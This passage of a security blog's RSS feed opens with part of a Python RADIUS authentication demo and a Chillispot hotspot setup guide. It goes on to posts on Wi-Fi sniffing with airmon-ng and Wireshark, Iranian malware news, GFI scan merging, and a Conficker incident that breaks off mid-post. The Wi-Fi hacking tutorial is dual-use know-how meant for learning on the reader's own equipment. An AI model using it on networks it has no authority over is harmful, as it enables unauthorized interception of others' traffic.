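def access_response(code, request, attributes, secret):
    """Reply to `request`; only someone holding `secret` can produce it."""
    ident, request_auth = request[1], request[4:20]
    auth = response_authenticator(code, ident, request_auth, attributes, secret)
    return packet(code, ident, auth, attributes)


def verify_response(response, request, secret):
    """NAS side: accept a reply only if it matches our request and secret."""
    if response[1] != request[1]:
        return False
    expected = response_authenticator(response[0], response[1], request[4:20],
                                      response[20:], secret)
    return hmac.compare_digest(expected, response[4:20])


def server_handle(request, secret, users):
    """Server side: recover the password and answer Accept or Reject."""
    pos, attrs = 20, {}
    while len(request) >= pos + 2:
        atype, alen = request[pos], request[pos + 1]
        if 2 > alen:
            break  # malformed attribute
        attrs[atype] = request[pos + 2:pos + alen]
        pos += alen
    password = reveal_password(attrs.get(USER_PASSWORD, b""), secret, request[4:20])
    ok = users.get(attrs.get(USER_NAME, b"")) == password
    return access_response(ACCESS_ACCEPT if ok else ACCESS_REJECT, request, b"", secret)


# Constructed values: the shared key from the Chilli config, one prepaid ticket
SECRET = b"chilli-shared-key"
USERS = {b"ticket0001": b"s3cret-pin"}
FIXED_REQUEST_AUTH = bytes(range(16))  # deterministic for the example only


def demo(secret_on_nas=SECRET, secret_on_server=SECRET):
    """Run one exchange; returns (reply code, NAS accepted the reply)."""
    req = access_request(7, b"ticket0001", b"s3cret-pin", b"cafe-ap-1",
                         secret_on_nas, FIXED_REQUEST_AUTH)
    resp = server_handle(req, secret_on_server, USERS)
    return resp[0], verify_response(resp, req, secret_on_nas)


if __name__ == "__main__":
    print("matching secrets:", demo())
    print("mismatched secrets:", demo(SECRET, b"wrong"))
```

Nothing in the exchange is tied to the NAS address, so clients.conf is the only place that binds a secret to a source IP; with 0.0.0.0/0 the secret alone is the credential.&lt;br /&gt;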
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3&lt;/b&gt; : hotspotlogin.cgi&lt;br /&gt;
Copy hotspotlogin.cgi from &lt;a href="http://chillispot.org"&gt;http://chillispot.org&lt;/a&gt; to /var/www/cgi-bin&lt;br /&gt;
Edit the file and change the secret to the UAM secret that you entered in the Chillispot configuration on the WRT54G.&lt;br /&gt;
&lt;br /&gt;
You can also use a PHP script. It is not as secure as the CGI script but easier to personalise. If you want a copy email me at sean@swarmhotspots.com&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4&lt;/b&gt; : phpMyPrepaid and MySQL&lt;br /&gt;
&lt;br /&gt;
Extract the phpMyPrepaid file to a directory on your web server, e.g. /var/www/html/myprepaid&lt;br /&gt;
Create a MySQL database called radius and create a user and password for it. Use the script called db_mysql.db that you will find in the phpMyPrepaid download to create the database tables.&lt;br /&gt;
Edit the dbconnect.php file in the phpMyPrepaid directory and enter the username and password for your MySQL radius database. IMPORTANT: save this file outside your web root, or the database password can be read by anyone who fetches it.&lt;br /&gt;
Edit config.inc.php and change the line that points to dbconnect to wherever you have saved dbconnect.php&lt;br /&gt;
In your web browser go to http://yoursite.com/whereveryouputphpmyprepaid/ and create some tickets. Check your database to see that the users have been set up in radcheck. Launch FreeRADIUS as root with the command radiusd -xxyx -l stdout. Pick a user and password from your database and try to log in from a wireless client. If you can, it is time for step 5. If not, go back to step 1 and check everything.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5&lt;/b&gt; : Have a cup of coffee and unwind. If all is well you have finished. I'll keep an eye on this post and do my best to help anyone with problems.&lt;br /&gt;
I have set up a free Radius test area for people that have no access to a Radius server. You can use this service to test your Chillispot configuration. The address is &lt;a href="http://swarmhotspots.com/Chilli-Test-Area"&gt;http://swarmhotspots.com/Chilli-Test-Area&lt;/a&gt;&lt;br /&gt;
Source: Howtoforge.com&lt;br /&gt;
</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/F-i7yB2xc8E/creating-wi-fi-internet-hotspot-service.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/05/creating-wi-fi-internet-hotspot-service.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-7466360541408000655</guid><pubDate>Sun, 15 May 2011 17:10:00 +0000</pubDate><atom:updated>2011-05-15T22:46:38.910+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">WiFi Hacking</category><title>WiFi Hacking Basics Part 1</title><description>If you are reading this you must have used Wi-Fi at least once, or maybe you have your own Wi-Fi network at home. Wi-Fi is cool, and hacking Wi-Fi is a lot more interesting. Here I will cover the basics of wireless networks and how they get hacked, so that you understand what is going on with your Wi-Fi.&lt;br /&gt;
I use the informal term Wi-Fi for wireless LAN because it is more familiar. My aim is to show how Wi-Fi is hacked, and you can try these attacks yourself. For that you will need:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;A laptop with BackTrack installed, or BackTrack in a VM&lt;/li&gt;
&lt;li&gt;An access point (AP)&lt;/li&gt;
&lt;li&gt;A USB Wi-Fi adapter that supports packet injection (I recommend an Alfa card)&lt;/li&gt;
&lt;li&gt;A smartphone or another laptop with Wi-Fi (as the victim)&lt;/li&gt;
&lt;/ul&gt;For those who don't know BackTrack: it is a pentest Linux distribution with all the necessary tools. The access point can be any SOHO Wi-Fi router. The USB adapter is needed for packet injection because most built-in laptop Wi-Fi chipsets do not support it.&lt;br /&gt;
So let's get started with the basics, or theory.&lt;br /&gt;
Your Wi-Fi card receives every frame sent on the channel it is tuned to, but in normal (managed) mode it only passes up the frames addressed to it, and only for the network it is connected to. The AP broadcasts its network's SSID all the time; the SSID is simply the name given to the wireless network. A network can be open or closed: an open network requires no authentication, while a closed network (here meaning one protected with a shared key, WEP or WPA) requires that key to connect. More on closed networks in later posts.&lt;br /&gt;
So how do we sniff which networks are there?&lt;br /&gt;
For this we use the Aircrack-ng suite that ships with BackTrack. To sniff raw frames we create a virtual monitor-mode interface called mon0 on top of the laptop's wireless interface, say wlan0.&lt;br /&gt;
The first task is to create mon0.&lt;br /&gt;
In BackTrack open a terminal and type &lt;i&gt;airmon-ng start wlan0&lt;/i&gt;&lt;br /&gt;
mon0 is now created. To verify it, type &lt;i&gt;ifconfig&lt;/i&gt;: you will see a mon0 interface with the same MAC address as your Wi-Fi card, and &lt;i&gt;iwconfig mon0&lt;/i&gt; should report Mode:Monitor.&lt;br /&gt;
The other tool we use, to look at the actual packets, is Wireshark. Fire it up by typing &lt;i&gt;wireshark &amp;amp;&lt;/i&gt; in the terminal, pick mon0 from the interface list and start a capture on it.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-kJbjG4BHHEs/TdAFLEHVRaI/AAAAAAAAAcI/irpkXyxhw8Q/s1600/mon0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://2.bp.blogspot.com/-kJbjG4BHHEs/TdAFLEHVRaI/AAAAAAAAAcI/irpkXyxhw8Q/s400/mon0.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You should then see lots of packets if there is any Wi-Fi network in your vicinity; if you don't see any traffic, create a network with your AP and look for its SSID in the beacons.&lt;br /&gt;
What we learned: &lt;b&gt;how to create mon0 and sniff traffic&lt;/b&gt;.&lt;br /&gt;
Contd.. part 2&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/FCuVs2yqQG8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/FCuVs2yqQG8/wifi-hacking-basics-part-1.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-kJbjG4BHHEs/TdAFLEHVRaI/AAAAAAAAAcI/irpkXyxhw8Q/s72-c/mon0.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.techkranti.com/2011/05/wifi-hacking-basics-part-1.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-4806211965138793863</guid><pubDate>Tue, 26 Apr 2011 05:51:00 +0000</pubDate><atom:updated>2011-04-26T22:21:07.794+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Viruses</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><title>Iran is getting paranoid over new cyber-attack 'Stars'</title><description>&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;After discovering an attack on its SCADA systems willing to take down their nuclear facility, Iran is probably getting paranoid over the whole malware cosmos. It seems that every other abnormal behavior on Iran's critical facility is viewed by them as an attack or a threat to their nuclear reactors. Yesterday Iran's Mehr News Agency reported that the country is under a new kind of cyber attack after Stuxnet, know as 'Stars'. Iran does not yet have complete information what adverse effects of this new so called 'Cyber Attack' is having on its systems.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;Excerpts from Mehr's report:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody"&gt;“(However),  certain characteristics about the Stars worm have been identified,  including that it is compatible with the (targeted) system and that the  damage is very slight in the initial stage, and it is likely to be  mistaken for executable files of the government,” &lt;/span&gt;Senior Iranian lawmaker &lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody"&gt;Jalali stated.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody"&gt;&amp;nbsp;It is not very sure from the official's statement, which operating system is being targeted by Stars. We have to wait for any official announcements from Iran's cyber experts before we or they reach a conclusion of Stars being a reality or is it just a hoax arising out of concern.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody"&gt;&lt;a name='more'&gt;&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;script type="text/javascript"&gt;
&lt;/script&gt; &lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody" style="font-size: small;"&gt;Elsewhere in his remarks, Jalali said that although the United States and Israel have flouted international law in their cyber attacks against Iran, this matter can still be pursued through legal channels. He also stated that Siemens, the supplier of the SCADA systems used by Iran's facilities, should be held responsible for Stuxnet.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody" style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span class="news_body" id="Newsdetails2_lblBody" style="font-size: small;"&gt;Well, Siemens might not be fully responsible, but it is partially so. How can one even think of using an OS like Windows, which is constantly under new attacks no matter which AV you install on it, for the administration of such critical systems? Windows is liked by all for its user-friendliness, and as a way of attracting more clients Siemens had introduced a Windows-compatible application for administering its SCADA systems, which had drastic consequences when it was targeted by Stuxnet.&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/vJakNtsMZSs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/vJakNtsMZSs/iran-is-getting-paranoid-over-new-cyber.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2011/04/iran-is-getting-paranoid-over-new-cyber.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-69917505514684173</guid><pubDate>Fri, 11 Mar 2011 18:14:00 +0000</pubDate><atom:updated>2011-03-11T23:44:43.651+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Miscellaneous</category><title>It is indeed "A Little World"</title><description>I would like to share my views, or rather I should say my feelings, about a beautiful technology I have encountered lately. What is Information Technology? This question always irritated me in college, although I was doing my engineering in the same stream. The answer that I found to this question, according to my view, is: "Information Technology is the APPLICATION of computer systems or computer science in various fields". Application - yes, that's the word. It is not the sophistication of the technology that matters, it is its application. 
A few months earlier I had posted about the &lt;a href="http://www.techkranti.com/2009/12/sixth-sense-technology-by-indian.html"&gt;Sixth Sense Technology&lt;/a&gt;. Almost a year after Sixth Sense, this is something that really moved me.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh5.googleusercontent.com/-T1vigH-rncQ/TXpmOUHpKlI/AAAAAAAAAcE/g2mnGD6q0LQ/s1600/alw_pic.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://lh5.googleusercontent.com/-T1vigH-rncQ/TXpmOUHpKlI/AAAAAAAAAcE/g2mnGD6q0LQ/s1600/alw_pic.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Well, not wasting much of your time, I should come straight to the point. It is about an organization I visited a week back. The name of the organization is exactly how I am feeling while writing this: it is indeed "A Little World". I'll try to explain here how it functions.&lt;br /&gt;
&lt;br /&gt;
The objective of the organization is to expand banking services to the remote villages of India, where the average daily income of a person is not more than a few hundred rupees. In finance terms, this is called "Financial Inclusion". Here's how they work:&lt;br /&gt;
&lt;br /&gt;
First, ALW ("A Little World") enters into an agreement with a bank, which allows ALW to open accounts and provide a way of transacting funds for the remote villagers.&lt;br /&gt;
&lt;br /&gt;
Once into an agreement, ALW appoints willing representatives from remote villages who are given a self-employment opportunity. These representatives are called "Customer Service Points" or "Customer Service Providers" (ALW, correct me if I am wrong). These CSPs are provided with a CSP kit which contains a Nokia mobile phone with a camera, NFC and Bluetooth, and a fingerprint reading and receipt printing device.&lt;br /&gt;
&lt;br /&gt;
Now if a villager wants to open an account, he approaches the CSP. The joining customer fills up a form and chooses one of the following means of identification:&lt;br /&gt;
1. The joining form itself&lt;br /&gt;
2. An ID card bearing a barcode, or&lt;br /&gt;
3. An NFC card which stores all customer data in electronic format&lt;br /&gt;
&lt;br /&gt;
After filling the form, as a means of authentication, fingerprints of six different fingers are scanned and stored in the customer database using the equipment (:( my bank does not provide biometric authentication). Finally a picture of the customer is taken using the provided mobile phone. All this data is then transferred over GPRS, immediately or at the end of the day, to ALW's customer database, which is then used to create an account with the bank.&lt;br /&gt;
&lt;br /&gt;
The bank then provides ALW with the account numbers of the enrolled accounts. ALW then creates the identification means for the customer, i.e. a barcode card or NFC card, which is sent to the corresponding CSP for the customer.&lt;br /&gt;
&lt;br /&gt;
This was about enrollment. Now let us see how a transaction takes place. The minimum transaction amount for customers with ALW is Rs. 10 and the maximum is Rs. 10000. Not too small, not too large for a villager. We are going to look at the transaction with the NFC card (it is very interesting). If a farmer needs to deposit Rs. 100 to his account, he visits the CSP with his card. To identify the customer, the CSP uses the phone, which has a custom-built application to read the data from the NFC card. The card is read by placing it close to the mobile phone. Once the customer is identified, the CSP enters the amount to be deposited, accepts the payment and prints the receipt from the equipment. The communication between the equipment and the mobile phone is done over Bluetooth.&lt;br /&gt;
&lt;br /&gt;
While withdrawing an amount, biometric authentication is done. ALW is in constant communication with the bank where the accounts are held to sync the transactions. What less does the CSP provide than a bank branch? Safe, secure and easily accessible banking is all that we require, and yes, ALW is providing it. When a demonstration of this was given to me, it really moved me. It was then that I felt the name of the organization really suits its purpose.&lt;br /&gt;
&lt;br /&gt;
I wish "A Little World" all the very best for their future plans and hope that RBI also blesses them with decent subsidies for their betterment.&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/nLpJoNkfF1I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/nLpJoNkfF1I/it-is-indeed-little-world.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://lh5.googleusercontent.com/-T1vigH-rncQ/TXpmOUHpKlI/AAAAAAAAAcE/g2mnGD6q0LQ/s72-c/alw_pic.jpg" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0176147 72.8561644</georss:point><georss:box>18.6930332 72.3892454 19.3421962 73.3230834</georss:box><feedburner:origLink>http://www.techkranti.com/2011/03/it-is-indeed-little-world.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-2378466117525163400</guid><pubDate>Fri, 17 Dec 2010 07:04:00 +0000</pubDate><atom:updated>2010-12-17T12:37:25.778+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security Tools</category><category domain="http://www.blogger.com/atom/ns#">Desktop Security</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><title>How to combine multiple GFI scans into a single report</title><description>One of TechKranti's regular readers Vinesh Redkar from Mumbai, India requested us to solve a problem he was facing while using GFI Languard. Here's what his query is:&lt;br /&gt;
&lt;div style="background-color: #9fc5e8;"&gt;"My compoany has recently bought GFI Languard for scanning the network for vulnerabilities and missing patches. I scanned 25 computers in my office network individually each time entering the credentials for the respective machine. Now I need a statistical report mentioning the percentage of High security vulnerabilities, missing patches and so on. How can I combine the results so that all of them depict one single scan."&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Kic0h6eqy-A/TQsMGZ2jtBI/AAAAAAAAAb0/GWi2pbkP4Bc/s1600/LAN-Box-145-151.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_Kic0h6eqy-A/TQsMGZ2jtBI/AAAAAAAAAb0/GWi2pbkP4Bc/s1600/LAN-Box-145-151.png" /&gt;&lt;/a&gt;&lt;/div&gt;Hey Vinesh, we are happy you raised this query. We are glad to attend to it. Here's the solution to your problem-&lt;br /&gt;
First of all, for those who have never used GFI Languard, let me tell you that GFI Languard is not a usual port scanning tool like nmap. GFI is liked by security admins as it is the perfect tool for performing a security audit of a network without actually having to hire a security consultant. GFI is a proprietary tool, but a trial version is available.&lt;br /&gt;
&lt;br /&gt;
So while scanning a machine using GFI Languard, you need to enter the administrator credentials for that machine, as this lets the tool go deep inside the OS to find missing patches and vulnerabilities. It also detects insecure settings configured on the system, the status of your antivirus software, and application vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
You can save GFI scans in XML format. This is the format that lets us combine the results into one aggregate. If you did not save the scans in XML format after scanning, you can still do so by loading the scan from the GFI database (Ctrl+O) and then doing a save operation (Ctrl+S). Following is the structure of a GFI XML result.&lt;br /&gt;
&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&amp;lt;Scan&amp;gt;&lt;br /&gt;
&amp;lt;hosts&amp;gt;&lt;br /&gt;
&amp;lt;host&amp;gt; &lt;br /&gt;
&amp;lt;/host&amp;gt;&lt;br /&gt;
&amp;lt;/hosts&amp;gt;&lt;br /&gt;
&amp;lt;/Scan&amp;gt;&lt;br /&gt;
&lt;br /&gt;
There are many more nodes within the host node, but we are not interested in them; GFI Languard is there to interpret them for us. So each &lt;u&gt;Scan&lt;/u&gt; root node has a &lt;u&gt;hosts&lt;/u&gt; child node, which has many &lt;u&gt;host&lt;/u&gt; child nodes. The &lt;u&gt;host&lt;/u&gt; node contains all the information about the scan for a specific host. If you understood this, all you need is a simple copy-and-paste job. You can edit these XML files using Notepad.&lt;br /&gt;
&lt;br /&gt;
Make a copy of any XML result file; this is your master file, in which you will be saving the final result. Now find the &amp;lt;/host&amp;gt; tag in the file. This is the end of your result for one particular host. If the master file you have selected contains multiple hosts, find the last occurrence of the &amp;lt;/host&amp;gt; tag. Now open, one by one, the other scans which you want to integrate into the final result. Copy the text from &amp;lt;host&amp;gt; to &amp;lt;/host&amp;gt;, which actually contains the result of your scan, and paste it after the last occurrence of the &amp;lt;/host&amp;gt; tag in the master file. Do this for all the individual scans and save the master file. You can open the saved master file in Firefox to confirm that it is well-formed and free of errors. You think it's done? Well, almost.&lt;br /&gt;
&lt;br /&gt;
Here's the catch. Even after doing this, when you open the final result in GFI on the same PC from which you had run the scans, it will only show the scans that were originally present in the master file. If this has ever happened to you and you have been wondering why it doesn't work, here's the solution.&lt;br /&gt;
&lt;br /&gt;
GFI Languard stores all its scan results in one MS Access database file (.mdb). It is less time-consuming for GFI to extract the scan results from the Access file than from an XML file. To lower the computation required while loading an XML scan result, GFI keeps track of scans using a session ID. This session ID can be found in the attributes of the &amp;lt;Scan&amp;gt; root node. Here's what it looks like (highlighted):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;Scan UIScan="" Session="&lt;span style="background-color: red;"&gt;145244609&lt;/span&gt;" Profile="Full Scan" CreatedOn="11/26/2010 02:52:46 PM" ReadOnly="0" ScansEnded=" 1" profilesenabled=" 1" ScanDuration=" 61" ScheduledScan=" 0" ScannedItemsCount=" 1642" AutoremediationEnabled_MissingPatches=" 0" AutoremediationEnabled_MissingServicePacks=" 0" AutoremediationEnabled_UninstallApplications=" 0"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When you create the master file, paste all the scans into it and try to load the file, GFI first looks at the Session attribute to determine whether the scan already exists in its database. So the solution to your problem is simple: just change the Session attribute to any new value (one GFI has not already recorded) and you are done. GFI will treat this as one single scan, and you can create aggregated reports for presenting to your management.&lt;br /&gt;
&lt;br /&gt;
I hope that solves your problem, Vinesh. Keep writing in; we would be glad to address your problems. Hey readers, if you too are looking for solutions to some problems, feel free to post your queries to &lt;b&gt;amey [at] techkranti [dot] com&lt;/b&gt; and we would be happy to help you.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: #fff2cc;"&gt;Get Security Tips n Tricks on your mobile.&lt;/div&gt;&lt;div style="background-color: #fff2cc;"&gt;Subscribe to &lt;a href="http://labs.google.co.in/smschannels/subscribe/techkranti" style="font-family: Arial,Helvetica,sans-serif;"&gt;TechKranti's   SMS channel&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: #fff2cc;"&gt;Subscribe to TechKranti's feeds &lt;a href="http://feeds.feedburner.com/blogspot/Gotp"&gt;&lt;img height="30" src="http://2.bp.blogspot.com/_Kic0h6eqy-A/S4ys7B1W7QI/AAAAAAAAAS8/7ituXPkPyNc/s1600/128px-Feed-icon.svg.png" width="30" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/EYZuHvaq7cc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/EYZuHvaq7cc/how-to-combine-multiple-gfi-scans-into.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_Kic0h6eqy-A/TQsMGZ2jtBI/AAAAAAAAAb0/GWi2pbkP4Bc/s72-c/LAN-Box-145-151.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2010/12/how-to-combine-multiple-gfi-scans-into.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-5700474940707367934</guid><pubDate>Sun, 12 Dec 2010 11:03:00 +0000</pubDate><atom:updated>2010-12-12T16:35:27.027+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security Tools</category><category domain="http://www.blogger.com/atom/ns#">Desktop Security</category><category domain="http://www.blogger.com/atom/ns#">Security News</category><category domain="http://www.blogger.com/atom/ns#">Hacking News</category><category domain="http://www.blogger.com/atom/ns#">Exploits</category><title>Nuisance of the Conficker Worm</title><description>An year back, we had posted about the nuisance of the Conficker Worm in &lt;a 
href="http://www.techkranti.com/2009/10/conflicker-c-worm.html"&gt;THIS POST&lt;/a&gt;. An year later, my colleague Mr. Gaurav Benjamin had a live experience with the havoc Conficker can create. Here is his experience in his own words:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: #cccccc;"&gt;&lt;span style="font-size: x-large;"&gt;"&lt;/span&gt;Hello Everybody,&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Just wanted to update you with an Issue which happened at Client site and how was it remediated.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Issue: Domain user accounts getting locked out automatically. When users would lock their terminals and go out for break after coming back their accounts were disabled automatically.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Investigations Done:&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;1.       Checking of domain controller policies for any inconsistencies.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;2.       Checking of presence of any virus by their antivirus. (McAfee)  Result: Nothing was found. (Was not updated)&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;3.       Systems &amp;amp; Server were not patched regularly with Latest patches.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;4.       Checking of security logs on Server. Result: No information was found.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Client Environment Information:&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;User Desktops: Windows 7&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Server: Windows 2008&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Alternative Solutions Recommended:&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;1.       Installing of free ware of AVG and run SCAN on affected machines.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;2.       Installing Nessus and scan the network for any vulnerabilities.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Issues Found: Detection of virus named “Conficker.B” .&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Summary on Functioning of Virus:&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Conficker primarily spreads through a Windows Vulnerability (MS08-067), which if un patched allows the worm to attack the Windows file sharing service. Conficker is a type of computer virus called a computer worm. Computer worms take advantage of un patched computer systems to automatically spread themselves.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Once a computer is infected, the infected system begins to scan the Internet, or its local network for un patched computers to infect.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Capabilities of this Virus:&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;1. Even if you have a backup service in case you get hit by a virus, Conficker Virus instantly disables this backup service so you will definitely be left with nothing.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;2. Conficker Virus will also not allow you to enter security websites.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;3. It will erase all your recently saved important and official documents.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;4. Conficker Virus will also not give you access to security sites and services.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;5. It will make your computer vulnerable to infected machines making you get more programs from the malware's creator.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Conficker virus comes in below mentioned versions:&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;* Win32/Conficker.A was reported to Microsoft on November 21, 2008.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;* Win32/Conficker.B was reported to Microsoft on December 29, 2008.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;* Win32/Conficker.C was reported to Microsoft on February 20, 2009.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;* Win32/Conficker.D was reported to Microsoft on March 4, 2009.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;* Win32/Conficker.E was reported to Microsoft on April 8, 2009.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Win32/Conficker.B might spread through file sharing and via removable drives, such as USB drives (also known as thumb drives). The worm adds a file to the removable drive so that when the drive is used, the AutoPlay dialog box will show one additional option.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
